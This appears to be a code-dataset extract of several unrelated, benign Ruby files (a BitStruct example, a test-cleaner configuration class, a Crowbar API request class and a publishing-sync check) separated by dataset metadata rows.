state = File.read("#{p}/state").strip
next unless state != 'in_sync'
p.gsub!(/.+\/dev-/, '')
failed_parts << "#{p} (#{state})"
end
failed_parts.join(', ')
rescue
nil
end
end
end
| 27.736842 | 166 | 0.596458 |
e9251a8b4662395c0837a51f69f8e8e248f000e7 | 545 | # an example where a field may crosse one or two byte boundaries
#
# try with arguments like 4, 12, and 13 to see the difference
#
# based on test case from Jon Hart
require 'bit-struct'
class Foo < BitStruct
unsigned :a, 4
unsigned :b, 8
unsigned :c, (ARGV[0] || (raise "USAGE: #{$0} bits")).to_i
end
puts Foo.describe
foo = Foo.new
p foo
p foo.unpack("B*").first.scan(/\d{8,8}/)
puts
foo.c = 3123
p foo
p foo.unpack("B*").first.scan(/\d{8,8}/)
puts
foo.c = (2**(ARGV[0].to_i)-1)
p foo
p foo.unpack("B*").first.scan(/\d{8,8}/)
puts
| 17.580645 | 64 | 0.645872 |
ac3d251414bc318817093b209a74fb5191722d43 | 3,011 | require "singleton"
module PseudoCleaner
class Configuration
include Singleton
# A simple configuration class for the PseudoCleaner
#
# Configurations:
# output_diagnostics - true/false
# if true, the system will use puts to output information about what it is doing...
attr_accessor :output_diagnostics
attr_accessor :clean_database_before_tests
attr_accessor :reset_auto_increment
attr_accessor :single_cleaner_set
attr_accessor :post_transaction_analysis
attr_accessor :db_connections
attr_accessor :peek_data_on_error
attr_accessor :peek_data_not_on_error
attr_accessor :enable_full_data_dump_tag
attr_accessor :disable_cornucopia_output
attr_accessor :benchmark
attr_accessor :redis_track_reads
def self.current_instance
self.instance
end
def initialize
@output_diagnostics = false # false to keep the noise level down...
@clean_database_before_tests = false # false because I think it will annoy developers...
@reset_auto_increment = true # true because I think it should be done
@single_cleaner_set = true # true because I hope it will improve performance
@post_transaction_analysis = false # should only be set true if you are searching for a problem
@db_connections = {}
@peek_data_on_error = true
@peek_data_not_on_error = false
@enable_full_data_dump_tag = true
@disable_cornucopia_output = false
@benchmark = false
@redis_track_reads = false
end
# Backwards comaptibility...
def self.db_connection=(connection)
self.instance.db_connection = connection
end
def self.db_connection(type)
self.instance.db_connection(type)
end
def db_connection=(connection)
if Object.const_defined?("ActiveRecord", false) && ActiveRecord.const_defined?("Base", false)
table_is_active_record = connection == ActiveRecord::Base
table_super_class = connection.superclass if connection
while !table_is_active_record && table_super_class
table_is_active_record = (table_super_class == ActiveRecord::Base)
table_super_class = table_super_class.superclass
end
@db_connections[:active_record] = connection if table_is_active_record
end
if Object.const_defined?("Sequel", false) && Sequel.const_defined?("Model", false)
@db_connections[:sequel] = connection
end
end
def db_connection(type)
if (!type)
if Object.const_defined?("Sequel", false) && Sequel.const_defined?("Model", false)
type = :sequel
else
type = :active_record
end
end
if type == :sequel
@db_connections[type] ||= Sequel::DATABASES[0]
else
@db_connections[type] ||= ActiveRecord::Base
end
@db_connections[type]
end
end
end | 34.215909 | 111 | 0.672534 |
bf5c66322e91d5b80ed081f04644ede8ac1c80fe | 1,587 | #
# Copyright 2015, SUSE Linux GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "easy_diff"
module Crowbar
module Client
module Request
module Proposal
#
# Implementation for the proposal create request
#
class Create < Base
#
# Override the request content
#
# @return [Hash] the content for the request
#
def content
super.easy_merge!(
attrs.payload.to_hash
)
end
#
# HTTP method that gets used by the request
#
# @return [Symbol] the method for the request
#
def method
:put
end
#
# Path to the API endpoint for the request
#
# @return [String] path to the API endpoint
#
def url
[
"crowbar",
attrs.barclamp,
"1.0",
"proposals"
].join("/")
end
end
end
end
end
end
| 24.415385 | 74 | 0.553245 |
abc41f2718152dc185ea60bba464b123df219d5f | 1,099 | statistics_announcements = StatisticsAnnouncement.unscoped.includes(:publication).all
check = DataHygiene::PublishingApiSyncCheck.new(statistics_announcements)
def has_been_redirected?(statistics_announcement)
publication_published?(statistics_announcement) || statistics_announcement.unpublished?
end
def publication_published?(statistics_announcement)
statistics_announcement.publication && statistics_announcement.publication.published?
end
check.add_expectation("base_path") do |content_store_payload, model|
content_store_payload["base_path"] == model.public_path
end
check.add_expectation("format") do |content_store_payload, model|
if has_been_redirected?(model)
content_store_payload["format"] == "redirect"
else
content_store_payload["format"] == "statistics_announcement"
end
end
check.add_expectation("title") do |content_store_payload, model|
if has_been_redirected?(model)
#announcements that relate to published statistics have 'null' title
#so we can ignore
true
else
content_store_payload["title"] == model.title
end
end
check.perform
| 31.4 | 89 | 0.806187 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.